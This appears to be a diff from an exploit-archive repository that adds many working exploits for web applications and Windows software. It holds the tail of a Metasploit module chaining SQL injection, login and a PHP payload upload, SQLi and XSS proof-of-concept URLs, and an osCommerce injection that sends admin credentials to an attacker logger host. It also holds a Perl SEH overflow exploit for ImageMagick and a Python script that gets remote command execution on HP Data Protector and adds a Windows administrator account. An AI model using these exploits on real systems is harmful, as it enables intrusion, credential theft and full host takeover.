payload_name = rand_text_alpha(rand(10) + 5) + '.php'
print_status("#{peer} - Using SQL injection to acquire credentials")
user = database_get_field('users', 'name', 0)
if user == false
print_error("#{peer} - Failed to acquire administrator username")
return
end
password = database_get_field('users', 'password', 0)
if password == false
print_error("#{peer} - Failed to acquire administrator password")
end
print_status("#{peer} - Using #{user}:#{password}")
res = send_request_cgi({
'method' => 'POST',
'uri'=>login,
'vars_post' => {
'submit' => '1',
'username' => user,
'password' => password
}
})
login_cookie = ""
if res and res.headers.has_key?('Location')
login_cookie = res.get_cookies
print_status("#{peer} - Login successful")
else
print_error("#{peer} - Failed to log in")
return
end
data = Rex::MIME::Message.new
data.add_part("MAX_FILE_SIZE", nil, nil, 'form-data; name="MAX_FILE_SIZE"')
data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"")
post_data = data.to_s
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => upload,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => login_cookie,
'data' => post_data
})
if res and res.code == 200 and res.body =~ /a href="upload.php\?del=(.*)">/
path = $1
if target.name =~ /Linux/
path = path.sub! "\\", "/"
end
target_path = normalize_uri(target_uri.path, path)
print_status("#{peer} - Requesting: #{target_path}")
send_request_raw({'uri' => normalize_uri(target_path)})
handler
else
print_error("#{peer} - Failed to upload file")
return
end
end
end

36
platforms/php/webapps/31350.txt Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: Control de Citas 1.4 (CIME) - Multiple Vulnerabilities
# Date: 01/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.cgaredes.tk/
# Software Link: http://sourceforge.net/projects/cime/files/latest/download?source=directory
[1] SQL Injection - 'USERNAME' vulnerable to time based attack
P0C: POST REQUEST
POST /cime/citasmedicas.php?pag=citasmedindex HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cime/citasmedicas.php?pag=citasmedindex
Cookie: PHPSESSID=ftkms6mdqi3039r41felgm39s1;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=[SQL INJECTION]&password=pass
[2] XSS Reflected on citasmedicas.php (must be logged)
P0C = http://localhost/cime/citasmedicas.php?pag=[XSS]
##

61
platforms/php/webapps/31515.txt Executable file
View file

@ -0,0 +1,61 @@
# Title: osCommerce v2.x SQL Injection Vulnerability
# Dork: Powered by osCommerce
# Author: Ahmed Aboul-Ela
# Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek
# Vendor : http://www.oscommerce.com
# Version: v2.3.3.4 (current latest release) and prior versions should be affected too
# References: http://www.secgeek.net/oscommerce-v2x-sql-injection-vulnerability
- Vulnerable Code snippet in "catalog/admin/geo_zones.php":
<?php
[...]
LINE 138: $rows = 0;
LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified,
a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . " c on a.zone_country_id = c.countries_id
left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID'] . " order by association_id";
LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows);
LINE 141: $zones_query = tep_db_query($zones_query_raw);
[...]
?>
As we can see at line 139 the GET zID parameter directly concatenated with the sql query
without any type of sanitization which leads directly to sql injection vulnerability
- Proof of Concept ( dump the admin username and password ):
http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --
- Exploitation & Attack Scenario:
an authenticated admin account is required to successfully exploit the vulnerability
but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack
Example to steal the administrator username & password and send it to php logger at "http://evilsite.com/logger.php?log=[ADMIN USER:HASH]"
We can use hybrid attack technique ( SQL Injection + XSS ) :
http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators --
- Mitigation:
The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now
https://github.com/gburton/oscommerce2/commit/e4d90eccd7d9072ebe78da4c38fb048bfe31c902
- Time-Line:
Mon, Feb 3, 2014 at 10:17 PM: vulnerability advisory sent to osCommerce
Tue, Feb 4, 2014 at 01:14 AM: recevied initial reply from osCommerce
Tue, Feb 4, 2014 at 02:06 AM: osCommerce released a quick fix for the vulnerability
Thu, Feb 6, 2014 at 05:15 PM: the public responsible disclosure
- Credits:
Ahmed Aboul-Ela - Information Security Consultant @ Starware

28
platforms/php/webapps/31525.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Extended Useradmininfo MyBB Plugin 1.2.1 - Cross Site
Scripting
# Google Dork: N/A
# Date: 09.02.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage: http://forum.mybboard.de/user-9022.html
# Software Link: http://mods.mybb.com/view/extended-useradmininfo
# Version: 1.2.1
# Tested on: PHP
Description:
This plugin shows advanced Informations about a user, such as last IP, User
Agent, Browser and Operating System. The information will be shown in a
user profile and visible only for people who are able to see the
adminoptions on user profiles.
Proof of Concept
1. Create a user account.
2. Change your user-agent to "Mozilla<script>alert(1)</script>".
3. Login and then... logout.
* The script will be executed whenever the administrator view your profile.
Solution:
Replace the content of "inc/plugins/extendeduseradmininfos.php" with this
fix:
http://pastebin.com/ncQCvwdq

18
platforms/php/webapps/31571.txt Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: Wordpress plugin Buddypress <= 1.9.1 privilege escalation
# Date: 11/02/2014
# Exploit Author: Pietro Oliva
# Vendor Homepage: http://buddypress.org
# Software Link: http://downloads.wordpress.org/plugin/buddypress.1.9.1.zip
# Version: 1.9.1
# CVE : [CVE-2014-1889]
# Vulnerability patched in version 1.9.2
it is possible to perform a privilege escalation attack due to a lack of
permissions check in the group creation process. A malicious user could
exploit this vulnerability to take control of every group (change name,
description, avatar and settings).
To exploit this vulnerability you have to follow these steps:
1) Create a cookie named bp_new_group_id=<id_of_victim_group>
2) Visit the url http://example.com/groups/create/step/group-details/
3) Enjoy the power

9
platforms/php/webapps/31697.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28898/info
Horde Webmail is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
This issue affects Kronolith 2.1.7. The vulnerable Kronolith versions are included in Horde Groupware 1.0.5 and Horde Groupware Webmail Edition 1.0.6.
http://www.example.com/horde/kronolith/addevent.php?timestamp=1208932200&url=[xss]

10
platforms/php/webapps/31700.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28917/info
e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
e107 0.7.0 is vulnerable; other versions may also be affected.
http://localhost/a/news.php?day."><script>alert("www.z0rlu.ownspace.org")</script>
http://localhost/a/search.php?q="><script>alert("www.z0rlu.ownspace.org")</script>&r=0&s.x=8&s.y=4

10
platforms/php/webapps/31701.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28918/info
Digital Hive is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/a/hive_v2.RC2/base.php?page=membres.php&mt=[XSS]

9
platforms/php/webapps/31702.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28919/info
The DownloadsPlus module for PHP-Nuke is prone to a vulnerability that lets remote attackers upload and execute arbitrary code because the application fails to sanitize user-supplied input. This issue permits attackers to upload arbitrary files with '.htm', '.html', or '.txt' extensions.
An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.
Note that to exploit this issue, the attacker may require valid login credentials.
http://www.example.com/phpnuke/upload_category/filename.html

7
platforms/php/webapps/31703.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28920/info
Pixel Motion Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://localhost/a/liste_article.php?jours="><script>alert()</script>

9
platforms/php/webapps/31704.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28922/info
PHCDownload is prone to an SQL-injection and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHCDownload 1.1.0 is vulnerable to these issues; other versions may also be affected.
http://localhost/upload/admin/index.php?hash=-1'/**/union/**/select/**/adminsession_user_id,1,adminsession_hash,adminsession_name,4,5,6,7/**/from/**/phcdl_sessions_admin/*

9
platforms/php/webapps/31705.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28922/info
PHCDownload is prone to an SQL-injection and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHCDownload 1.1.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/upload/install/index.php?step="><script>alert()</script>

9
platforms/php/webapps/31708.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28942/info
The Visites component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Visites 1.1 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]

11
platforms/php/webapps/31709.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28943/info
Siteman is prone to a local file-include vulnerability and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this as a cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Or, the attacker may exploit the issue as a local file-include vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Siteman 2.0.x2 is vulnerable; other versions may also be affected.
http://www.example.com/siteman2/index.php?module=[XSS]

9
platforms/php/webapps/31712.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28957/info
miniBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
miniBB 2.2a is vulnerable; other versions may also be affected.
http://www.example.com/bb_admin.php?action=searchusers2&whatus=" /> <script>alert(document.cookie)</script>&searchus=id

9
platforms/unix/remote/31706.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28926/info
IBM Lotus Expeditor is prone to a command-execution vulnerability because it fails to properly sanitize input.
Successfully exploiting this issue allows remote attackers to execute arbitrary commands in the context of users that follow malicious URIs.
We don't know which specific versions of IBM Lotus Expeditor are affected. We will update this BID as more information emerges.
cai:"%20-launcher%20\\6.6.6.6\d$\trojan

11
platforms/windows/dos/31711.html Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28946/info
Microsoft Excel is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny access to legitimate users. Given the nature of this vulnerability, attackers may also be able to execute arbitrary code, but this has not been confirmed.
Microsoft Excel 2007 is vulnerable; other versions may also be affected.
<html>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('Yacubian')></OBJECT>
<img>

1480
platforms/windows/local/31524.rb Executable file
View file

File diff suppressed because it is too large Load diff

107
platforms/windows/local/31688.pl Executable file
View file

@ -0,0 +1,107 @@
#!/usr/bin/perl
########################################################################################
# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)
# Date: 2-13-2014
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)
# Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/
# Version Tested: 6.8.8-4
# Tested On: Windows XP SP3
########################################################################################
# Credits:
#
# CVE-2014-1947 published Feb 08 2014
# by Justin Grant
# http://www.securityfocus.com/bid/65478/info
#
########################################################################################
# Overview:
#
# I saw the notice for this CVE today but there was no known published expoits so
# I figured I'd put together this quick POC. Note, all app modules for the tested
# version were compiled with safeSEH so my use of an OS module may require adjustment
# of the offsets. There also appears to be several bad chars that fail the sploit.
# For this POC I only generate a basic messagebox using FatalAppExit(). It may take
# some work to get it to do more.
#
# How it works:
#
# This particular BOF takes advantage of insecure handling of the english.xml file
# which the app uses to display various error messages. I didn't spend much time
# investigating the app so there may be additional vulnerable locations
#
# This script generates two files:
# 1) a malfored .bmp file that will cause ImageMagick to generate a specific
# error when opened (LengthAndFilesizeDoNotMatch), as defined in the
# english.xml file
# 2) a modified english.xml file that replaces the original error message with
# our exploit code
#
# To test this POC:
# 1) run the script, replace the original english.xml file (in App's folder)
# 2) open the .bmp file with ImageMagick
########################################################################################
# file write function
sub write_file {
my ($file, $buffer) = @_;
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";
}
# create bmp file header; needs to be a valid header to generate necessary error
sub bmp_header {
my $header = "\x42\x4d"; # BM
$header = $header . "\x46\x00\x00\x00"; # file size (70 bytes)
$header = $header . "\x00\x00\x00\x00"; # unused
$header = $header . "\x36\x00\x00\x00"; # bitmap offset
$header = $header . "\x28\x00\x00\x00"; # header size
$header = $header . "\x02\x00\x00\x00"; # width
$header = $header . "\x02\x00\x00\x00"; # height
$header = $header . "\x01\x00"; # num of color planes
$header = $header . "\x18\x00"; # num of bits per pixel
$header = $header . "\x00\x00\x00\x00"; # compression (none)
$header = $header . "\x10\x00\x00\x00"; # image size
$header = $header . "\x13\x0b\x00\x00"; # horizontal resolution (2,835 pixels/meter)
$header = $header . "\x13\x0b\x00\x00"; # vertical resolution (2,835 pixels/meter)
$header = $header . "\x00\x00\x00\x00"; # colors in palette
$header = $header . "\x00\x00\x00\x00"; #important colors
return $header;
}
## Construct the corrupted bmp file which will trigger the vuln
my $header = bmp_header();
my $data = "\x41" x (5000 - length($header)); # arbitrary file data filler
my $buffer = $header.$data;
write_file("corrupt.bmp", $buffer);
# construct the buffer payload for our xml file
my $buffsize = 100000;
my $junk = "\x41" x 62504; # offset to next seh at 568
my $nseh = "\xeb\x32\x90\x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret
# ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\WINDOWS\system32\OLEACC.dll)
my $junk2 = "\x41" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button
my $nops = "\x90" x 100;
# this is just a POC shellcode that displays a messagebox using the FatalAppExit function
my $shell = "\xb9\x7c\xec\xa5\x7c" . # Unicode String "FailSilently" (address may vary)
"\x31\xc0" . # xor eax, eax
"\xbb\xb2\x1b\x86\x7c" . # kernel32.dll FatalAppExit()
"\x51" . # push ecx
"\x50" . # push eax
"\xff\xd3"; # call ebx
my $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk
$sploit = $sploit.$fill; # assemble the final buffer
# build the malicious xml file
my $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">';
$xml = $xml . $sploit;
$xml = $xml . '</message></warning></image></corrupt></exception></locale>';
my $buffer = $xml;
write_file("english.xml", $buffer);

123
platforms/windows/remote/31689.py Executable file
View file

@ -0,0 +1,123 @@
import argparse
import socket
"""
Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-2347
Date: February 14, 2014
Vendor Homepage: www.hp.com
Version: 6.10, 6.11, 6.20
Tested On: Windows Server 2003, Windows Server 2008 R2
References:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422
http://www.zerodayinitiative.com/advisories/ZDI-14-008/
Details:
The omniinet service, which runs by default on port 5555, is susceptible
to numerous remotely exploitable vulnerabilities. By sending a malicious
EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet
service to run an arbitrary command. On Windows, the omniinet service is
running as SYSTEM. This allows for complete compromise of the remote
host.
To exploit this vulnerability, you only need to send two specific arguments.
Omniinet has an argument parser that will extract these out and
eventually pass them to a call to CreateProcessW via the lpCommandLine
parameter.
When a packet is sent to the omniinet service, it will check the opcode
and look up an associated function to call based on the opcode in a table
of function pointers. The function to handle EXEC_BAR packets requires that
the packet contain at least 19 arguments. The 18th argument will be the
command we want to execute, and the 19th will be an argument we can pass to
the command we are executing. This exploit will create a new windows account
and add it to the local Administrators group. This means that lpCommandLine
that gets passed to CreateProcess will need to look like:
'c:\windows\system32\cmd.exe' '/c net user usr p@ss!23 /add'
and
'c:\windows\system32\cmd.exe' '/c net localgroup Administrators usr /add'
Note: The 19th value has size constraints so it needs to be as short of a
string as possible.
"""
exec_bar_add_user = \
"\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x75\x00\x73\x00" + \
"\x72\x00\x20\x00\x70\x00\x40\x00\x73\x00\x73\x00\x21\x00\x32\x00" + \
"\x33\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"
exec_bar_make_admin = \
"\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00" + \
"\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00" + \
"\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00" + \
"\x72\x00\x73\x00\x20\x00\x75\x00\x73\x00\x72\x00\x20\x00\x2f\x00" + \
"\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"
def connect_target(target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err:
print "[-]ERROR CREATING SOCKET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
try:
sock.connect((target, port))
except socket.error as err:
print "[-]ERROR CONNECTING TO TARGET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
return sock
def send_recv_packet(sock, packet):
sock.sendall(packet)
res = sock.recv(4096)
return res
cmdline_parser = argparse.ArgumentParser(description='HP Data Protector EXEC_BAR Remote Command Execution')
cmdline_parser.add_argument('-t', dest='ip', help='Target host ip', required=True)
cmdline_parser.add_argument('-p', dest='port', help='Target port', default=5555, type=int, required=False)
args = cmdline_parser.parse_args()
print "\n[*]ATTEMPING TO ADD WINDOWS ADMINISTRATOR ACCOUNT usr WITH PASSWORD p@ss!23"
for packet in [exec_bar_add_user, exec_bar_make_admin]:
target = connect_target(args.ip, args.port)
if target == -1: exit()
data = send_recv_packet(target, packet)
print "[*]SERVER RESPONSE: " + \
data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$")
target.close()

9
platforms/windows/remote/31699.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28907/info
RSA Authentication Agent for Web is prone to a remote URI-redirection vulnerability because the application fails to adequately sanitize user-supplied input.
A successful attack may aid in phishing-style attacks.
This issue affects RSA Authentication Agent for Web for Internet Information Services 5.3.0.258. Other versions may also be affected.
https://www.example.com/WebID/IISWebAgentIF.dll?Redirect?url=ftp://www.example2.com/index.htm